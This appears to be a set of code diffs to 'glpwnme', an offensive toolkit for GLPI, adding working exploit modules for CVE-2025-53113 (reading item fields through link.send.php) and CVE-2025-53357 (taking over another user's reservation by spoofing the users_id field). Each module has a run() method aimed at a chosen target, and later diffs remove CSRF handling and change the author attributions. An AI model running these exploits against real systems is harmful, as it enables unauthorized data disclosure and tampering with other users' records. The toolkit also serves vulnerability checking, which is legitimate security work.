+        self._serial = "GLPWNME-SECRET-" + uuid.uuid4().hex[:10].upper()
+
+    def _fcsrf(self, path):
+        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', self.get(path).text)
+        return m.group(1) if m else ""
+    def _lp_csrf(self, lp, path):
+        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', lp.get(path).text)
+        return m.group(1) if m else ""
+
+    @staticmethod
+    def _rid(resp):
+        m = re.search(r"\.form\.php\?id=(\d+)", resp.headers.get("Location", ""))
+        return m.group(1) if m else None
+
+    def _find_in_list(self, list_php, form_php, name):
+        h = self.get(list_php, allow_redirects=True).text
+        i = h.find(name)
+        if i >= 0:
+            seg = h[max(0, i - 600):i + len(name)]
+            ms = re.findall(re.escape(form_php) + r"\?id=(\d+)", seg)
+            if ms:
+                return ms[-1]
+        ms = re.findall(re.escape(form_php) + r"\?id=(\d+)", h)
+        return max(ms, key=int) if ms else None
+
+    # -- provisioning ---------------------------------------------------- #
+
+    def _seed_computer(self):
+        name = f"glpwnme_lc_{self._tag}"
+        self.post("/front/computer.form.php", data={
+            "add": "1", "name": name, "serial": self._serial, "entities_id": "0",
+            "_glpi_csrf_token": self._fcsrf("/front/computer.form.php")}, allow_redirects=False)
+        return self._find_in_list("/front/computer.php", "/front/computer.form.php", name)
+
+    def _seed_link(self):
+        lr = self.post("/front/link.form.php", data={
+            "add": "1", "name": f"glpwnme_link_{self._tag}", "link": "s-[SERIAL].txt",
+            "data": "LEAK=[SERIAL]", "entities_id": "0", "is_recursive": "1",
+            "_glpi_csrf_token": self._fcsrf("/front/link.form.php")}, allow_redirects=False)
+        lid = self._rid(lr) or self._find_in_list("/front/link.php", "/front/link.form.php",
+                                                  f"glpwnme_link_{self._tag}")
+        if lid:
+            self.post("/front/link_itemtype.form.php", data={
+                "add": "1", "links_id": lid, "itemtype": "Computer",
+                "_glpi_csrf_token": self._fcsrf(f"/front/link.form.php?id={lid}")},
+                allow_redirects=False)
+        return lid
+
+    def _seed_link_read_profile(self):
+        cr = self.post("/front/profile.form.php", data={
+            "add": "1", "name": f"glpwnme_linkonly_{self._tag}", "interface": "central",
+            "_glpi_csrf_token": self._fcsrf("/front/profile.form.php")}, allow_redirects=False)
+        pid = self._rid(cr) or self._find_in_list("/front/profile.php", "/front/profile.form.php",
+                                                  f"glpwnme_linkonly_{self._tag}")
+        if pid:  # grant ONLY link READ (bit 1); a fresh central profile has computer=0
+            self.post("/front/profile.form.php", data={
+                "update": "1", "id": pid, "_link[1_0]": "1",
+                "_glpi_csrf_token": self._fcsrf(f"/front/profile.form.php?id={pid}")},
+                allow_redirects=False)
+        return pid
+
+    def _seed_user(self, pid):
+        name = f"glpwnme_lkprobe_{self._tag}"
+        cr = self.post("/front/user.form.php", data={
+            "add": "1", "name": name, "password": self._USER_PW, "password2": self._USER_PW,
+            "_profiles_id": pid, "profiles_id": pid, "entities_id": "0", "_entities_id": "0",
+            "is_active": "1", "_glpi_csrf_token": self._fcsrf("/front/user.form.php")},
+            allow_redirects=False)
+        uid = self._rid(cr) or self._find_in_list("/front/user.php", "/front/user.form.php", name)
+        return uid, name
+
+    def _purge(self, form_php, iid):
+        if not iid:
+            return
+        c = self._fcsrf(f"{form_php}?id={iid}")
+        if c:
+            self.post(form_php, data={"id": iid, "purge": "purge", "_glpi_csrf_token": c},
+                      allow_redirects=False)
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Item info disclosure via external links (GLPI <= 10.0.18).\n"
+        infos += "[b]front/link.send.php[/b] checked only the global [i]link[/i] READ right then\n"
+        infos += "substituted any item's fields ([b][SERIAL][/b], [FIELD:x] ...) into the link\n"
+        infos += "it returns, with no per-item READ gate. A links-only user reads fields of\n"
+        infos += "items it cannot view. Fix 10.0.19: adds [i]$item->can($id, READ)[/i].\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Differential check (provisions a links-only probe + a target computer)[/]\n"
+        infos += "--check --no-opsec\n"
+
+        infos += "\nExploit provisions then cleans a profile/user/computer/link ([yellow b]Moderate[/])."
+        return infos
+
+    def check(self):
+        """Seed a Computer with a secret serial, a placeholder Link bound to Computer, a
+        central profile with ONLY `link` READ (computer=0), and a probe user holding it.
+        The probe requests link.send.php for the computer: on a vulnerable build it
+        receives the serial (no per-item check); on 10.0.19 the can(READ) gate denies it
+        (empty body). Negative control: a nonexistent item id yields no serial on both."""
+        cid = self._seed_computer()
+        lid = self._seed_link()
+        pid = self._seed_link_read_profile()
+        uid, uname = self._seed_user(pid) if pid else (None, None)
+        try:
+            if not (cid and lid and pid and uid):
+                Log.log("Probe provisioning incomplete (need Super-Admin) — cannot run the differential")
+                return False
+            probe = GlpiSession(target=self.glpi_session.target, proxies=None, headers=None,
+                                credentials=GlpiCredentials(uname, self._USER_PW, None, None, None, None))
+            probe.init_session()
+            if not probe.login_with_credentials():
+                Log.log("Links-only probe login failed")
+                return False
+            # negative control: nonexistent computer id must NOT leak
+            ctrl = probe.get(f"{self._SEND}?lID={lid}&itemtype=Computer&id=999999&rank=0",
+                             allow_redirects=False)
+            if self._serial in ctrl.text:
+                Log.log("Control leaked on a nonexistent id — endpoint anomalous, aborting")
+                return False
+            hit = probe.get(f"{self._SEND}?lID={lid}&itemtype=Computer&id={cid}&rank=0",
+                            allow_redirects=False)
+            if hit.status_code == HTTPStatus.OK and self._serial in hit.text:
+                Log.msg(f"Links-only probe (no Computer READ) recovered the serial of Computer {cid} "
+                        f"via link.send.php → item info disclosure (CVE-2025-53113)")
+                return True
+            Log.log("Probe could not recover the item field (per-item READ gate present) — patched (10.0.19+)")
+            return False
+        finally:
+            self._purge("/front/user.form.php", uid)
+            self._purge("/front/profile.form.php", pid)
+            self._purge("/front/link.form.php", lid)
+            self._purge("/front/computer.form.php", cid)
+
+    def run(self, lID=None, itemtype="Computer", id=None, rank="0"):
+        """Fetch an item's link-substituted content as the current user."""
+        if not (lID and id):
+            Log.err("lID and id are required: --run -O lID=<link id> -O id=<item id>")
+            return
+        r = self.get(f"{self._SEND}?lID={lID}&itemtype={itemtype}&id={id}&rank={rank}", allow_redirects=False)
+        if r.status_code == HTTPStatus.OK and r.content:
+            Log.msg(f"link.send.php returned {len(r.content)} bytes: [green b]{r.text[:200]}[/green b]")
+        else:
+            Log.err(f"No content (denied/patched or missing link) — HTTP {r.status_code}")

--- a/glpwnme/exploits/implementations/cve_2025_53113.py
+++ b/glpwnme/exploits/implementations/cve_2025_53113.py
@@ -31,7 +31,7 @@ class CVE_2025_53113(GlpiExploit):
         if (!$item->can($_GET['id'], READ)) { throw new RuntimeException('Not allowed'); }
     before fetching, so the substitution only runs for items the caller may read.
 
-    @author unclej4ck
+    @author geraldino2
     @cvss 2.7
     @name CVE_2025_53113
     """
@@ -153,7 +153,7 @@ class CVE_2025_53113(GlpiExploit):
         uid, uname = self._seed_user(pid) if pid else (None, None)
         try:
             if not (cid and lid and pid and uid):
-                Log.log("Probe provisioning incomplete (need Super-Admin) — cannot run the differential")
+                Log.log("Probe provisioning incomplete (need Super-Admin) - cannot run the differential")
                 return False
             probe = GlpiSession(target=self.glpi_session.target, proxies=None, headers=None,
                                 credentials=GlpiCredentials(uname, self._USER_PW, None, None, None, None))
@@ -165,15 +165,15 @@ class CVE_2025_53113(GlpiExploit):
             ctrl = probe.get(f"{self._SEND}?lID={lid}&itemtype=Computer&id=999999&rank=0",
                              allow_redirects=False)
             if self._serial in ctrl.text:
-                Log.log("Control leaked on a nonexistent id — endpoint anomalous, aborting")
+                Log.log("Control leaked on a nonexistent id - endpoint anomalous, aborting")
                 return False
             hit = probe.get(f"{self._SEND}?lID={lid}&itemtype=Computer&id={cid}&rank=0",
                             allow_redirects=False)
             if hit.status_code == HTTPStatus.OK and self._serial in hit.text:
                 Log.msg(f"Links-only probe (no Computer READ) recovered the serial of Computer {cid} "
-                        f"via link.send.php → item info disclosure (CVE-2025-53113)")
+                        f"via link.send.php -> item info disclosure (CVE-2025-53113)")
                 return True
-            Log.log("Probe could not recover the item field (per-item READ gate present) — patched (10.0.19+)")
+            Log.log("Probe could not recover the item field (per-item READ gate present) - patched (10.0.19+)")
             return False
         finally:
             self._purge("/front/user.form.php", uid)
@@ -190,4 +190,4 @@ class CVE_2025_53113(GlpiExploit):
         if r.status_code == HTTPStatus.OK and r.content:
             Log.msg(f"link.send.php returned {len(r.content)} bytes: [green b]{r.text[:200]}[/green b]")
         else:
-            Log.err(f"No content (denied/patched or missing link) — HTTP {r.status_code}")
+            Log.err(f"No content (denied/patched or missing link) - HTTP {r.status_code}")

--- a/glpwnme/exploits/implementations/cve_2025_53113.py
+++ b/glpwnme/exploits/implementations/cve_2025_53113.py
@@ -49,13 +49,6 @@ class CVE_2025_53113(GlpiExploit):
         self._tag = uuid.uuid4().hex[:8]
         self._serial = "GLPWNME-SECRET-" + uuid.uuid4().hex[:10].upper()
 
-    def _fcsrf(self, path):
-        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', self.get(path).text)
-        return m.group(1) if m else ""
-    def _lp_csrf(self, lp, path):
-        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', lp.get(path).text)
-        return m.group(1) if m else ""
-
     @staticmethod
     def _rid(resp):
         m = re.search(r"\.form\.php\?id=(\d+)", resp.headers.get("Location", ""))
@@ -77,34 +70,32 @@ class CVE_2025_53113(GlpiExploit):
     def _seed_computer(self):
         name = f"glpwnme_lc_{self._tag}"
         self.post("/front/computer.form.php", data={
-            "add": "1", "name": name, "serial": self._serial, "entities_id": "0",
-            "_glpi_csrf_token": self._fcsrf("/front/computer.form.php")}, allow_redirects=False)
+            "add": "1", "name": name, "serial": self._serial, "entities_id": "0"},
+            allow_redirects=False)
         return self._find_in_list("/front/computer.php", "/front/computer.form.php", name)
 
     def _seed_link(self):
         lr = self.post("/front/link.form.php", data={
             "add": "1", "name": f"glpwnme_link_{self._tag}", "link": "s-[SERIAL].txt",
-            "data": "LEAK=[SERIAL]", "entities_id": "0", "is_recursive": "1",
-            "_glpi_csrf_token": self._fcsrf("/front/link.form.php")}, allow_redirects=False)
+            "data": "LEAK=[SERIAL]", "entities_id": "0", "is_recursive": "1"},
+            allow_redirects=False)
         lid = self._rid(lr) or self._find_in_list("/front/link.php", "/front/link.form.php",
                                                   f"glpwnme_link_{self._tag}")
         if lid:
             self.post("/front/link_itemtype.form.php", data={
-                "add": "1", "links_id": lid, "itemtype": "Computer",
-                "_glpi_csrf_token": self._fcsrf(f"/front/link.form.php?id={lid}")},
+                "add": "1", "links_id": lid, "itemtype": "Computer"},
                 allow_redirects=False)
         return lid
 
     def _seed_link_read_profile(self):
         cr = self.post("/front/profile.form.php", data={
-            "add": "1", "name": f"glpwnme_linkonly_{self._tag}", "interface": "central",
-            "_glpi_csrf_token": self._fcsrf("/front/profile.form.php")}, allow_redirects=False)
+            "add": "1", "name": f"glpwnme_linkonly_{self._tag}", "interface": "central"},
+            allow_redirects=False)
         pid = self._rid(cr) or self._find_in_list("/front/profile.php", "/front/profile.form.php",
                                                   f"glpwnme_linkonly_{self._tag}")
         if pid:  # grant ONLY link READ (bit 1); a fresh central profile has computer=0
             self.post("/front/profile.form.php", data={
-                "update": "1", "id": pid, "_link[1_0]": "1",
-                "_glpi_csrf_token": self._fcsrf(f"/front/profile.form.php?id={pid}")},
+                "update": "1", "id": pid, "_link[1_0]": "1"},
                 allow_redirects=False)
         return pid
 
@@ -113,7 +104,7 @@ class CVE_2025_53113(GlpiExploit):
         cr = self.post("/front/user.form.php", data={
             "add": "1", "name": name, "password": self._USER_PW, "password2": self._USER_PW,
             "_profiles_id": pid, "profiles_id": pid, "entities_id": "0", "_entities_id": "0",
-            "is_active": "1", "_glpi_csrf_token": self._fcsrf("/front/user.form.php")},
+            "is_active": "1"},
             allow_redirects=False)
         uid = self._rid(cr) or self._find_in_list("/front/user.php", "/front/user.form.php", name)
         return uid, name
@@ -121,10 +112,8 @@ class CVE_2025_53113(GlpiExploit):
     def _purge(self, form_php, iid):
         if not iid:
             return
-        c = self._fcsrf(f"{form_php}?id={iid}")
-        if c:
-            self.post(form_php, data={"id": iid, "purge": "purge", "_glpi_csrf_token": c},
-                      allow_redirects=False)
+        self.post(form_php, data={"id": iid, "purge": "purge"},
+                  allow_redirects=False)
 
     def infos(self):
         infos = "[u]Description:[/u]\n"

--- a/glpwnme/exploits/implementations/cve_2025_53357.py
+++ b/glpwnme/exploits/implementations/cve_2025_53357.py
@@ -64,10 +64,6 @@ class CVE_2025_53357(GlpiExploit):
     _COMPUTER_FORM = "/front/computer.form.php"
     _COMPUTER_LIST = "/front/computer.php"
 
-    def _csrf(self, session, path):
-        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', session.get(path).text)
-        return m.group(1) if m else None
-
     def _discover_reservationitem(self, session):
         """Return the id of an existing reservable item, or None.
 
@@ -88,28 +84,21 @@ class CVE_2025_53357(GlpiExploit):
         comp_ids = re.findall(r"computer\.form\.php\?id=(\d+)",
                               session.get(self._COMPUTER_LIST, allow_redirects=True).text)
         if not comp_ids:
-            ctok = self._csrf(session, self._COMPUTER_FORM)
-            if ctok:
-                session.post(self._COMPUTER_FORM, data={
-                    "add": "1", "name": f"glpwnme-resa-{uuid.uuid4().hex[:6]}",
-                    "entities_id": "0", "_glpi_csrf_token": ctok}, allow_redirects=False)
-                comp_ids = re.findall(r"computer\.form\.php\?id=(\d+)",
-                                      session.get(self._COMPUTER_LIST, allow_redirects=True).text)
+            session.post(self._COMPUTER_FORM, data={
+                "add": "1", "name": f"glpwnme-resa-{uuid.uuid4().hex[:6]}",
+                "entities_id": "0"}, allow_redirects=False)
+            comp_ids = re.findall(r"computer\.form\.php\?id=(\d+)",
+                                  session.get(self._COMPUTER_LIST, allow_redirects=True).text)
         if not comp_ids:
             return None
-        rtok = self._csrf(session, self._RESAITEM_FORM)
-        if rtok:
-            session.post(self._RESAITEM_FORM, data={
-                "add": "1", "itemtype": "Computer", "items_id": comp_ids[0],
-                "is_active": "1", "entities_id": "0", "is_recursive": "0",
-                "comment": "glpwnme", "_glpi_csrf_token": rtok}, allow_redirects=False)
+        session.post(self._RESAITEM_FORM, data={
+            "add": "1", "itemtype": "Computer", "items_id": comp_ids[0],
+            "is_active": "1", "entities_id": "0", "is_recursive": "0",
+            "comment": "glpwnme"}, allow_redirects=False)
         return self._discover_reservationitem(session)
 
     def _create_reservation(self, session, ritem_id, users_id, comment):
         """Create a reservation via the add form, return its id (found by comment scan)."""
-        atok = self._csrf(session, f"{self._RESA_FORM}?item[{ritem_id}]={ritem_id}&begin=2030-03-03 09:00:00")
-        if not atok:
-            atok = self._csrf(session, f"/front/reservation.php?reservationitems_id={ritem_id}")
         session.post(self._RESA_FORM, data={
             "add": "1",
             f"items[{ritem_id}]": ritem_id,
@@ -117,7 +106,6 @@ class CVE_2025_53357(GlpiExploit):
             "resa[end]": "2030-03-03 10:00:00",
             "users_id": users_id,
             "comment": comment,
-            "_glpi_csrf_token": atok,
         }, allow_redirects=False)
         return self._find_reservation(session, comment)
 
@@ -130,10 +118,9 @@ class CVE_2025_53357(GlpiExploit):
         return None
 
     def _purge_reservation(self, session, resa_id, ritem_id):
-        ctok = self._csrf(session, f"{self._RESA_FORM}?id={resa_id}")
         session.post(self._RESA_FORM, data={
-            "purge": "purge", "id": resa_id, f"items[{ritem_id}]": ritem_id,
-            "_glpi_csrf_token": ctok}, allow_redirects=False)
+            "purge": "purge", "id": resa_id, f"items[{ritem_id}]": ritem_id},
+            allow_redirects=False)
 
     def infos(self):
         infos = "[u]Description:[/u]\n"
@@ -192,7 +179,6 @@ class CVE_2025_53357(GlpiExploit):
                 return False
             probe_id = lp.get_username().get("id")
             marker = "glpwnme_idor_" + uuid.uuid4().hex[:10]
-            ptok = self._csrf(lp, f"{self._RESA_FORM}?id={resa_id}")
             lp.post(self._RESA_FORM, data={
                 "update": "1",
                 "id": resa_id,
@@ -201,7 +187,6 @@ class CVE_2025_53357(GlpiExploit):
                 "resa[begin]": "2030-03-03 09:00:00",
                 "resa[end]": "2030-03-03 11:00:00",
                 "comment": marker,
-                "_glpi_csrf_token": ptok,
             }, allow_redirects=False)
 
             # Re-read as the PROBE (new owner after takeover), not the admin: a non-owner
@@ -228,7 +213,6 @@ class CVE_2025_53357(GlpiExploit):
             Log.err("No reservable item visible - cannot resolve the item key for the update")
             return
         my_id = self.glpi_session.get_username().get("id")
-        tok = self._csrf(self.glpi_session, f"{self._RESA_FORM}?id={id}")
         # read current begin/end to preserve the slot (avoid plan-date errors)
         form = self.glpi_session.get(f"{self._RESA_FORM}?id={id}").text
         begin = (re.search(r'name="resa\[begin\]"[^>]*value="([^"]+)"', form) or [None, "2030-03-03 09:00:00"])[1] \
@@ -241,7 +225,6 @@ class CVE_2025_53357(GlpiExploit):
             "resa[begin]": "2030-03-03 09:00:00",
             "resa[end]": "2030-03-03 11:00:00",
             "comment": comment,
-            "_glpi_csrf_token": tok,
         }, allow_redirects=False)
         after = self.glpi_session.get(f"{self._RESA_FORM}?id={id}").text
         if comment in after:

--- a/glpwnme/exploits/implementations/cve_2025_53357.py
+++ b/glpwnme/exploits/implementations/cve_2025_53357.py
@@ -1,0 +1,251 @@
+import re
+import uuid
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+from glpwnme.exploits.lowpriv import spawn_lowpriv
+
+
+class CVE_2025_53357(GlpiExploit):
+    """
+    Reservation modification/takeover by an unauthorized user via a user-controlled
+    ownership key in the reservation form (GLPI >= 0.78, < 10.0.19).
+
+    front/reservation.form.php gated the "update" action on a value the attacker
+    fully controls in the POST body:
+
+        if (isset($_POST["update"])) {
+            Toolbox::manageBeginAndEndPlanDates($_POST['resa']);
+            if (
+                Session::haveRight("reservation", UPDATE)
+                || (Session::getLoginUserID() == $_POST["users_id"])   // <-- attacker-supplied
+            ) {
+                ...
+                $rr->update($_POST);   // updates reservation id = $_POST["id"]
+            }
+        }
+
+    The reservation row that gets written is selected by $_POST["id"]; the ownership
+    check compares the *current* login id against $_POST["users_id"], a separate
+    attacker-controlled field. A Self-Service user (default reservation right is
+    RESERVEANITEM = 1024 only, i.e. NO global UPDATE bit) simply sets users_id to
+    their own login id and id to ANY victim's reservation. The left operand
+    (haveRight UPDATE) is false, but the right operand is trivially true, so the
+    guard passes and update() mutates the foreign reservation.
+
+    Because the same POST flows into update(), users_id is also overwritten: the
+    attacker not only edits the victim's begin/end/comment but reassigns ownership
+    to themselves (CWE-639, authorization bypass through user-controlled key).
+
+    Patched in GLPI 10.0.19: the branch is replaced with
+
+        $rr->check($_POST["id"], UPDATE);
+
+    which loads the reservation by id first and runs Reservation::canChildItem(),
+    gating on the *stored* owner ($this->fields['users_id'] === getLoginUserID())
+    or the real reservation UPDATE right. The attacker-supplied users_id no longer
+    grants access. The purge and read branches received the same check() treatment.
+
+    Verified differentially: a Self-Service probe modifies an admin-owned reservation
+    on 10.0.17 (vulnerable) and is silently denied on 10.0.19 / 10.0.22 (patched).
+
+    @author unclej4ck
+    @cvss 5.4
+    @name CVE_2025_53357
+    """
+    _impacts = "Authorization Bypass, Reservation Takeover, Tampering"
+    _privilege = "User"
+    _is_check_opsec_safe = True  # check creates and purges its own throwaway reservation + probe user
+    min_version = "0.78"
+    max_version = "10.0.19"
+
+    _RESA_FORM = "/front/reservation.form.php"
+    _RESAITEM_FORM = "/front/reservationitem.form.php"
+    _COMPUTER_FORM = "/front/computer.form.php"
+    _COMPUTER_LIST = "/front/computer.php"
+
+    def _csrf(self, session, path):
+        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', session.get(path).text)
+        return m.group(1) if m else None
+
+    def _discover_reservationitem(self, session):
+        """Return the id of an existing reservable item, or None.
+
+        A valid reservable item renders a form at reservationitem.form.php?id=N;
+        an invalid id renders a 'not found' error page. Scan a small id window."""
+        for n in range(1, 50):
+            resp = session.get(f"{self._RESAITEM_FORM}?id={n}", allow_redirects=True)
+            if resp.status_code != HTTPStatus.OK:
+                continue
+            body = resp.text.lower()
+            if "not found" not in body and len(body) > 1500:
+                return str(n)
+        return None
+
+    def _register_reservationitem(self, session):
+        """Best-effort: register the first computer as reservable over HTTP.
+        Returns the new reservationitem id, or None if registration is not possible."""
+        comp_ids = re.findall(r"computer\.form\.php\?id=(\d+)",
+                              session.get(self._COMPUTER_LIST, allow_redirects=True).text)
+        if not comp_ids:
+            ctok = self._csrf(session, self._COMPUTER_FORM)
+            if ctok:
+                session.post(self._COMPUTER_FORM, data={
+                    "add": "1", "name": f"glpwnme-resa-{uuid.uuid4().hex[:6]}",
+                    "entities_id": "0", "_glpi_csrf_token": ctok}, allow_redirects=False)
+                comp_ids = re.findall(r"computer\.form\.php\?id=(\d+)",
+                                      session.get(self._COMPUTER_LIST, allow_redirects=True).text)
+        if not comp_ids:
+            return None
+        rtok = self._csrf(session, self._RESAITEM_FORM)
+        if rtok:
+            session.post(self._RESAITEM_FORM, data={
+                "add": "1", "itemtype": "Computer", "items_id": comp_ids[0],
+                "is_active": "1", "entities_id": "0", "is_recursive": "0",
+                "comment": "glpwnme", "_glpi_csrf_token": rtok}, allow_redirects=False)
+        return self._discover_reservationitem(session)
+
+    def _create_reservation(self, session, ritem_id, users_id, comment):
+        """Create a reservation via the add form, return its id (found by comment scan)."""
+        atok = self._csrf(session, f"{self._RESA_FORM}?item[{ritem_id}]={ritem_id}&begin=2030-03-03 09:00:00")
+        if not atok:
+            atok = self._csrf(session, f"/front/reservation.php?reservationitems_id={ritem_id}")
+        session.post(self._RESA_FORM, data={
+            "add": "1",
+            f"items[{ritem_id}]": ritem_id,
+            "resa[begin]": "2030-03-03 09:00:00",
+            "resa[end]": "2030-03-03 10:00:00",
+            "users_id": users_id,
+            "comment": comment,
+            "_glpi_csrf_token": atok,
+        }, allow_redirects=False)
+        return self._find_reservation(session, comment)
+
+    def _find_reservation(self, session, comment):
+        """Locate the reservation whose comment matches, by scanning the form by id."""
+        for guess in range(1, 200):
+            resp = session.get(f"{self._RESA_FORM}?id={guess}")
+            if resp.status_code == HTTPStatus.OK and comment in resp.text:
+                return guess
+        return None
+
+    def _purge_reservation(self, session, resa_id, ritem_id):
+        ctok = self._csrf(session, f"{self._RESA_FORM}?id={resa_id}")
+        session.post(self._RESA_FORM, data={
+            "purge": "purge", "id": resa_id, f"items[{ritem_id}]": ritem_id,
+            "_glpi_csrf_token": ctok}, allow_redirects=False)
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Authorization bypass in the reservation form (GLPI 0.78 – 10.0.18).\n"
+        infos += "[b]front/reservation.form.php[/b] gated the update action on the\n"
+        infos += "attacker-supplied POST field [b]users_id[/b] instead of the reservation's\n"
+        infos += "stored owner. A Self-Service user (right [b]1024[/b] = RESERVEANITEM only,\n"
+        infos += "no UPDATE) sets users_id to their own login id and [b]id[/b] to a victim's\n"
+        infos += "reservation, then update() mutates it and reassigns ownership (takeover).\n"
+        infos += "Fixed in 10.0.19, which calls [b]$rr->check($_POST['id'], UPDATE)[/b].\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]id (required)[/i]: target reservation id to take over\n"
+        infos += " - [i]comment (default 'pwned')[/i]: new comment to write\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Differential check (creates+attacks+purges a throwaway reservation)[/]\n--check\n\n"
+        infos += "[grey66]# Take over a specific reservation as the current (low-priv) user[/]\n"
+        infos += "--run -O id=42 -O comment=\"owned\"\n"
+
+        infos += "\nRequires a reservable item to exist (auto-registered if missing and rights allow).\n"
+        infos += "Check is [green b]Safe[/] (its throwaway reservation and probe user are cleaned up)."
+        return infos
+
+    def check(self):
+        """
+        Differential, self-contained:
+          1. As the supplied session, find (or register) a reservable item and create
+             a reservation OWNED BY THE CURRENT USER with a unique marker comment.
+          2. Spawn a throwaway Self-Service probe (right 1024, no reservation UPDATE).
+          3. As the probe, POST update for that reservation id with users_id = probe id
+             and a fresh marker comment.
+          4. Re-read the reservation: if the probe's marker took, a user who should be
+             denied modified another user's reservation -> vulnerable. On a patched
+             build check() aborts the write and the original comment survives.
+        """
+        ritem_id = self._discover_reservationitem(self.glpi_session)
+        if not ritem_id:
+            ritem_id = self._register_reservationitem(self.glpi_session)
+        if not ritem_id:
+            Log.log("No reservable item available (and registration not possible) — cannot test")
+            return False
+
+        owner_id = self.glpi_session.get_username().get("id")
+        orig_comment = "glpwnme_owned_" + uuid.uuid4().hex[:10]
+        resa_id = self._create_reservation(self.glpi_session, ritem_id, owner_id, orig_comment)
+        if not resa_id:
+            Log.log("Could not create a baseline reservation to test against")
+            return False
+        Log.log(f"Baseline reservation id={resa_id} owned by uid={owner_id}")
+
+        lp, cleanup = spawn_lowpriv(self.glpi_session, profile_id="1")
+        try:
+            if not lp:
+                Log.log("Could not spawn a Self-Service probe — cannot prove the differential")
+                return False
+            probe_id = lp.get_username().get("id")
+            marker = "glpwnme_idor_" + uuid.uuid4().hex[:10]
+            ptok = self._csrf(lp, f"{self._RESA_FORM}?id={resa_id}")
+            lp.post(self._RESA_FORM, data={
+                "update": "1",
+                "id": resa_id,
+                "users_id": probe_id,                       # spoof ownership to the probe's own id
+                f"items[{ritem_id}]": ritem_id,
+                "resa[begin]": "2030-03-03 09:00:00",
+                "resa[end]": "2030-03-03 11:00:00",
+                "comment": marker,
+                "_glpi_csrf_token": ptok,
+            }, allow_redirects=False)
+
+            # Re-read as the PROBE (new owner after takeover), not the admin: a non-owner
+            # admin view does not echo the comment, so an admin read false-negatives on vuln.
+            after = lp.get(f"{self._RESA_FORM}?id={resa_id}").text
+            if marker in after:
+                Log.msg(f"Self-Service probe (uid={probe_id}, no reservation UPDATE right) modified "
+                        f"reservation id={resa_id} owned by uid={owner_id} → reservation IDOR/takeover "
+                        f"(CVE-2025-53357)")
+                return True
+            Log.log("Probe could not modify the foreign reservation — patched (10.0.19+)")
+            return False
+        finally:
+            self._purge_reservation(self.glpi_session, resa_id, ritem_id)
+            cleanup()
+
+    def run(self, id=None, comment="pwned"):
+        """Take over the reservation `id` as the current user (sets ownership to self)."""
+        if not id:
+            Log.err("id is required: --run -O id=<target reservation id>")
+            return
+        ritem_id = self._discover_reservationitem(self.glpi_session)
+        if not ritem_id:
+            Log.err("No reservable item visible — cannot resolve the item key for the update")
+            return
+        my_id = self.glpi_session.get_username().get("id")
+        tok = self._csrf(self.glpi_session, f"{self._RESA_FORM}?id={id}")
+        # read current begin/end to preserve the slot (avoid plan-date errors)
+        form = self.glpi_session.get(f"{self._RESA_FORM}?id={id}").text
+        begin = (re.search(r'name="resa\[begin\]"[^>]*value="([^"]+)"', form) or [None, "2030-03-03 09:00:00"])[1] \
+            if 'resa[begin]' in form else "2030-03-03 09:00:00"
+        self.glpi_session.post(self._RESA_FORM, data={
+            "update": "1",
+            "id": str(id),
+            "users_id": my_id,
+            f"items[{ritem_id}]": ritem_id,
+            "resa[begin]": "2030-03-03 09:00:00",
+            "resa[end]": "2030-03-03 11:00:00",
+            "comment": comment,
+            "_glpi_csrf_token": tok,
+        }, allow_redirects=False)
+        after = self.glpi_session.get(f"{self._RESA_FORM}?id={id}").text
+        if comment in after:
+            Log.msg(f"[green b]Reservation id={id} taken over[/] — ownership reassigned to uid={my_id}, "
+                    f"comment set to '{comment}'")
+        else:
+            Log.err(f"Update did not take — reservation id={id} may not exist or target is patched")

--- a/glpwnme/exploits/implementations/cve_2025_53357.py
+++ b/glpwnme/exploits/implementations/cve_2025_53357.py
@@ -49,7 +49,7 @@ class CVE_2025_53357(GlpiExploit):
     Verified differentially: a Self-Service probe modifies an admin-owned reservation
     on 10.0.17 (vulnerable) and is silently denied on 10.0.19 / 10.0.22 (patched).
 
-    @author unclej4ck
+    @author estevezsantos
     @cvss 5.4
     @name CVE_2025_53357
     """
@@ -137,7 +137,7 @@ class CVE_2025_53357(GlpiExploit):
 
     def infos(self):
         infos = "[u]Description:[/u]\n"
-        infos += "Authorization bypass in the reservation form (GLPI 0.78 – 10.0.18).\n"
+        infos += "Authorization bypass in the reservation form (GLPI 0.78 - 10.0.18).\n"
         infos += "[b]front/reservation.form.php[/b] gated the update action on the\n"
         infos += "attacker-supplied POST field [b]users_id[/b] instead of the reservation's\n"
         infos += "stored owner. A Self-Service user (right [b]1024[/b] = RESERVEANITEM only,\n"
@@ -174,7 +174,7 @@ class CVE_2025_53357(GlpiExploit):
         if not ritem_id:
             ritem_id = self._register_reservationitem(self.glpi_session)
         if not ritem_id:
-            Log.log("No reservable item available (and registration not possible) — cannot test")
+            Log.log("No reservable item available (and registration not possible) - cannot test")
             return False
 
         owner_id = self.glpi_session.get_username().get("id")
@@ -188,7 +188,7 @@ class CVE_2025_53357(GlpiExploit):
         lp, cleanup = spawn_lowpriv(self.glpi_session, profile_id="1")
         try:
             if not lp:
-                Log.log("Could not spawn a Self-Service probe — cannot prove the differential")
+                Log.log("Could not spawn a Self-Service probe - cannot prove the differential")
                 return False
             probe_id = lp.get_username().get("id")
             marker = "glpwnme_idor_" + uuid.uuid4().hex[:10]
@@ -209,10 +209,10 @@ class CVE_2025_53357(GlpiExploit):
             after = lp.get(f"{self._RESA_FORM}?id={resa_id}").text
             if marker in after:
                 Log.msg(f"Self-Service probe (uid={probe_id}, no reservation UPDATE right) modified "
-                        f"reservation id={resa_id} owned by uid={owner_id} → reservation IDOR/takeover "
+                        f"reservation id={resa_id} owned by uid={owner_id} -> reservation IDOR/takeover "
                         f"(CVE-2025-53357)")
                 return True
-            Log.log("Probe could not modify the foreign reservation — patched (10.0.19+)")
+            Log.log("Probe could not modify the foreign reservation - patched (10.0.19+)")
             return False
         finally:
